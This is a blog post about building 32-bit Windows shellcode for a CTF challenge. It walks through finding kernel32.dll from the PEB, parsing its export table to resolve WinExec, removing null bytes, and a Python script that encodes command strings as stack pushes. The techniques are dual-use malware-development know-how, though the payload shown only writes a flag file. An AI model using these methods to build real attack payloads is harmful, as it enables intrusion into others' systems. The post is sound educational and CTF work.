Windows Shellcoding - 1 : Using WinExec

I was busy making some mini hells for challenges for ISSessions CTF 2025, when I stumbled upon the idea of incorporating shellcode into it while learning about how to create malware (nothing illegal, promise). 

So I go in all ambitious, only to have my hopes and dreams mercilessly crushed by windows, and after spending a day buried in windows api documentation with a few visits to NT api docs which ended with me questioning my life's choices, I finally found something, let me show you.

The process for getting windows syscalls, so apparently the way to make syscalls isn't simple, cause like with everything, windows takes pleasure in being difficult. You call Windows API, which is just a wrapper for NT API or Native API, which again is a wrapper for the actual syscall so it goes like Windows API > NT API > syscall.

Now the NT API functions are carried out by ntdll.dll while windows API has a few for different functions like kernel32.dll, user32.dll etc.

So whenever you open a program the ntdll.dll and kernel32.dll will get loaded as they provide for basic functionality for operations, you can view this using Listdlls command which comes with the sysinternals suite.

As you can see, notepad.exe here loaded ntdll.dll then kernel32.dll and then kernelbase.dll, the addresses for these are always constant until reboot as they are only loaded into the memory once and then referenced by other programs, until next reboot of the system.

Technically you can just pull the address from here and use it your shellcode and it will work, but it would work only for the current machine at current state.

So I needed to find a way to get the address dynamically, and since its loaded by every program there should be something.

Now there is a very helpful resource for this kind of information within the PE, its called the Thread Environment Block (TEB), this is either in FS (x86) or GS (x64) register and has a lot of information about the thread currently running.

We are however only interested in something stored at FS:0x30 (x86) register or GS:0x60 (x64) register. This is the Linear address of Process Environment Block (PEB).


Assuming we work with a 32-bit PE, the PEB_LDR_DATA variable will be found 0x0C bytes from beginning of PEB. This PEB_LDR_DATA has a very helpful list,

This is the head of a doubly linked list which has the addresses of the modules loaded in memory in the order we saw in the Listdlls output.

Again, assuming we work with 32-bit PE, this would be 0x14 from the base address of PEB_LDR_DATA.

To verify all these, I compiled a very basic C executable in 32-bit format and opened it up in WinDBG.

Note: This is my main machine, the Listdlls output was from a VM and thus the base addresses for ntdll.dll, kernel32.dll and kernelbase.dll differ.

Anyways moving on, I found LDR at exactly +0x0C (+0x18 in x64).

Following inside LDR, I was able to get the linked list, more like lists, guess the reserved bytes in the documentation were for the other two.

And as expected the InMemoryOrderModuleList is at +0x14 (+0x20 in x64).

Since the each LDR entry points to an LDR_DATA_TABLE_ENTRY, which is a structure for storing information about the module loaded, well we're only interested in the base address of the loaded dll stored in here.

So assuming we work with 32-bit system, the DllBase would be at +0x10 since the LIST_ENTRY is basically a struct with two pointers so that's 2*4 Bytes + 8 Bytes + 2*4 Bytes = 24 bytes.

Now that is all verified, lets move onto making a simple assembly program which will get us the address of ntdll.dll and kernel32.dll, i.e., the second and third module to be loaded.

    mov ebx, fs:0x30        ; PEB
    mov ebx, [ebx + 0x0C]   ; Ldr
    mov ebx, [ebx + 0x14]   ; InMemoryOrderModuleList
    mov ebx, [ebx]          ; Flink (the executable itself)
    mov ebx, [ebx]          ; Flink (ntdll.dll)
    mov ebx, [ebx + 0x10]   ; BaseAddress
    mov ebx, [ebx]          ; Flink (kernel32.dll)
    mov ebx, [ebx + 0x10]   ; BaseAddress

This something which will load into ebx (I was using eax initially but that led to the objdump having various null bytes), the base address of ntdll.dll and kernel32.dll, lets assemble it and run it after inserting the 32-bit executable I made earlier in x32dbg.

A little touch of bash and we have the hex, there are still null bytes which I couldn't figure how to remove so I guess I'll have to see how it goes.

objdump -d ./shell.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '
 |tr -s ' '|tr '\t' ' '|sed 's/ $//g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
" 64 8b 1d 30 00 00 8b 5b 0c 8b 5b 14 8b 1b 8b 1b 8b 5b 10 8b 1b 8b 5b 10"

Null bytes caused a minor complication which I fixed by manually adding another pair of them to match the disassembly of the file.

After running I realised, I seemed to have been a bit off mark, for some reason the first time I'm pulling the base address, which was supposed to ntdll.dll base address, turned out to be the base address for kernel32.dll.

ebx : 75DB0000     kernel32.75DB0000

If you check back up with the base listed in the WinDBG screenshot, its the same one.

Intrigued by this development, I remove one of the `mov ebx, [ebx]` instruction by editing out the bytes [8B1B] which ended up giving me the address for ntdll.dll.

ebx : 77530000     ntdll.77530000

I realised a bit late that the first entry would be pointed at by the head itself, here is the updated assembly to get the base address of kernel32.dll. Also after a bit of research I found that I could eliminate the null bytes in the beginning with adding an empty register to the `fs:0x30` address.

    xor eax, eax
    mov ebx, [fs:0x30 + eax]    ; PEB
    mov ebx, [ebx + 0x0C]       ; PEB_LDR_DATA
    mov ebx, [ebx + 0x14]       ; InMemoryOrderModuleList (first entry)
    mov ebx, [ebx]              ; Flink (ntdll.dll)
    mov ebx, [ebx]              ; Flink (kernel32.dll)
    mov ebx, [ebx + 0x10]       ; BaseAddress

You can use ecx to store the addresses too if you want, its just eax that ends up with the shellcode having multiple sections of null bytes.

Moving on, I open kernel32.dll in PEview to look at the exports for finding WinExec and formulating a way to get to it in assembly.

I look at the headers, and with some research online, I found that this field of DOS header is always constant, +0x3C from the base address.

This points to the PE signature, which is a constant 0x78 bytes from the Export Table RVA (relative virtual address).

Note: RVA when added to the base address (at runtime) gives the function address, so when the module is in memory, the PE Address would be base addr. + RVA of PE Header.

And moving onto the Exports Table, which is the IMAGE_EXPORT_DIRECTORY we can find the number of exported functions at +0x14 from the base of Exports Table, at +0x1C we can find the RVA of Address Table, at +0x20 is the Name Pointer Table and finally at +0x24 is the Ordinal Table.

Address Table, as the name suggests holds addresses of the exported functions.

Name Pointer Table entries point to null terminated strings which serve as names of the exported functions.

Ordinal Table holds ordinal values associated with the exported functions, each entry has an index in address table allows the function to be accessed with its ordinal number.

So I need to get these three's addresses to be able to call 'WinExec'.

; look for address of Address Table, Name Pointer Table & Ordinal Table in kernel32.dll
mov eax, [ebx + 0x3C]   ; PE Signature RVA (base + 0x3C)
add eax, ebx            ; PE Signature addr.
mov eax, [eax + 0x78]   ; Export Table RVA (PE addr. + 0x78)
add eax, ebx            ; Export Table addr.

mov edx, [eax + 0x14]   ; Number of exported functions

mov ecx, [eax + 0x1C]   ; RVA of Address Table (Export Table addr. + 0x1C)
add ecx, ebx            ; Addr. of Address Table
mov [ebp - 0x0C], ecx   ; Store Address Table addr. in var C

mov ecx, [eax + 0x20]   ; RVA of Name Pointer Table (Export Table addr. + 0x20)
add ecx, ebx            ; Addr. of Name Pointer Table
mov [ebp - 0x10], ecx   ; Store Name Pointer Table addr. in var 10

mov ecx, [eax + 0x24]   ; RVA of Ordinal Table (Export Table addr. + 0x24)
add ecx, ebx            ; Addr. of Ordinal Table
mov [ebp - 0x14], ecx   ; Store Ordinal Table addr. in var 14

Assuming from my previous snippet we have the base address of kernel32.dll in ebx, this would allow me to save those addresses to memory.

I was a bit anxious so I ran a little verification by injecting this code into my 32-bit executable and running in x32dbg to verify if the values were loaded correctly, and I was almost jumping in joy because they were. I have spent almost two days on this challenge XD

Next step, loop through Name Pointer table to look for "WinExec".

Initially I came up with a basic logic with help from online references:

; look for the string
.scan:
    mov edi, [ebp - 0x10]   ; Name Pointer Table addr.
    mov esi, [ebp - 0x04]   ; String "WinExec"
    xor ecx, ecx            ; clearing the character counter
    cld                     ; clear direction flag to read strings left to right
   
    ; since we're moving the base address of Name Pointer Table in edi every turn,
    ; and each entry is 4 bytes, just increment by the position (eax) * 4 bytes
    ; that gets us the RVA of n'th entry
    mov edi, [edi + eax * 0x04]
    add edi, ebx    ; get addr. of n'th entry

    add cx, 0x07    ; Num of bytes to be compared in "WinExec"
    repe cmpsb      ; repeat until equal, compare esi and edi byte by byte
    jz sc.good     ; if match is found (ZF=1), jump to the label 'good'
   
    inc eax         ; increment counter
    cmp eax, edx    ; compare if we reached the last exported function
    jb sc.scan     ; if eax < edx, continue loop
   
    jmp sc.fin

I had scasb/scasd in mind initially for the comparison but on further research I found that that instruction is more suitable when looking for say a character pattern within string, thus I settled on using cmpsb for searching as it compares the strings side by side, which was closer to my requirements.

So here's a funny thing, initially I was moving 0x08 into the character counter for comparing the first 8 bytes, i.e., 7 character bytes of "WinExec" + 1 Null byte, which seems perfectly logical.

But on running this as an injected code in x32dbg, I got an 'Access Violation' exception, and I was confused as to why, so I ran through the code again and apparently it was getting the address of 'Wow64DisableWow64Redirection', which on looking into kernel32.dll, is the next entry from 'WinExec'.

I carefully stepped through the comparison routine once again, manually adjusting the value of position counter so I don't have to sit through 1,536 (0x600) comparisons as I knew from the dll's name pointer table that the position of 'WinExec' is after atleast the 1,568th (0x620) entry.

When I do arrive at the comparison where 'WinExec' is loaded into edi, the comparisons goes normally but the value left in cx by the end of it is 0x2, which seemed to be root of the issue as that cause the address stored in edi to be incremented by one, thus handing me 'Wow64DisableWow64Redirection' instead of 'WinExec', so I tested changing the value in cx to 0x7, i.e., not accounting for null byte to see if that would work.

It worked perfectly, but when I went through the pushing of my command which was apparently 'C:\\Windows\\System32\\cmd.exe /c \"flag\" > flag.txt', and while converting it into hex and then swapping the endianness, I forgot to add 'echo' so I was presented with another error saying that flag was not a operable batch file, this once I couldn't blame cmd.exe for being an absolute trash since it was actually my mistake.

Going through the push statements was the most troublesome, like converting a string to hex and then swapping it from big endian to little endian for our poor x86 cpu since it can't read big endian.

I was tired of having to manually do this chore so I decided why not use the holy grail of chores nobody wants to do, yes, automating it in python (it did take me like 20 mins to debug as I haven't touched python in ages)

# Get input from user
iStr = input("Enter the string: ")

# Convert string to bytes
bStr = iStr.encode('utf-8')

# Convert bytes to hex
hStr = bStr.hex()

# Split hex string into chunks of 4 bytes
byteChunks = [hStr[i:i+8] for i in range(0, len(hStr), 8)]

# Print each chunk in order it will go on the stack
for chunk in reversed(byteChunks):
    # switch bytes from Big Endian to Little Endian
    chunk = chunk[6:8] + chunk[4:6] + chunk[2:4] + chunk[0:2]
    print("push 0x" + chunk)

But with this everything was set, and I shed tears of happiness when the shell code finally worked without issues throughout, I had sunk two days into this.

Though I also learnt a lot in that time. Here's the whole code if you want to look at it, I believe this same principle can be applied to calling other Windows API functions as long as we satisfy their arguments properly into stack.

Oh a side note when using WinExec to call cmd with /c option, cmd doesn't like null bytes in its command, I learnt this the hard way.

Comments

Popular posts from this blog

Malware Analysis Report: Sample SmokeScreen

[TryHackMe] BrainPan 1